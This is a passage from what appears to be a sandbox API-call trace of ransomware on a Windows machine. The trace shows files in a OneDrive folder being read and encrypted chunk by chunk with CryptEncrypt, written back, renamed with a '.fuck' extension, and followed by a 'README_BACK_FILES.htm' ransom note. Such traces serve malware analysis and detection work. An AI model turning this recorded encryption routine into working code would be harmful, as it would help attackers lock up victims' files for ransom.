lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.012] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.012] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.012] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.012] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.012] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.012] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.013] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.013] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.013] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.013] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.013] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.013] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.013] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.013] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.013] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.013] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.013] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.013] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.013] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.014] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.014] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.014] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.014] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.014] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.014] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.014] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.014] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.014] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.014] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.014] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.014] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.014] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.014] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.014] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.015] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.015] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.015] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.015] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.015] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.015] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.015] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.015] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.015] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.015] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.015] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.015] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.015] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.016] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.016] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.016] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.016] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.016] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.016] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.016] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.016] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.016] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.016] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.016] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.016] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.016] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.016] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.017] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.017] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.017] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.017] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.017] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.017] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.017] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.017] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.017] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.017] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.017] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.017] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x1d0, lpOverlapped=0x0) returned 1 [0276.017] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x1d0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x1e0) returned 1 [0276.017] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x1e0, lpOverlapped=0x0) returned 1 [0276.018] CloseHandle (hObject=0x5d48) returned 1 [0276.018] CloseHandle (hObject=0x5d3c) returned 1 [0276.018] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gd-latn\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gd-latn\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0276.037] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0276.039] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gd-latn\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0276.046] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gd-latn\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gd-latn\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0276.047] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0276.047] CryptDestroyKey (hKey=0x2fb548) returned 1 [0276.047] CryptReleaseContext (hProv=0x2f2a0e0, dwFlags=0x0) returned 1 [0276.047] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0276.047] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0276.047] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gd-latn\\readme_back_files.htm")) returned 0xffffffff [0276.048] AreFileApisANSI () returned 1 [0276.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e28c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 101 [0276.048] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gd-latn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0276.049] GetFileType (hFile=0x5d4c) returned 0x1 [0276.049] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0276.050] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0276.050] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gl\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0276.051] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.051] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.051] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0276.051] GetLastError () returned 0x0 [0276.051] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gl\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gl\\filesync.localizedresources.dll.mui")) returned 0x20 [0276.052] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gl\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0276.052] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gl\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gl\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0276.054] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gl\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gl\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0276.056] SetFileAttributesA 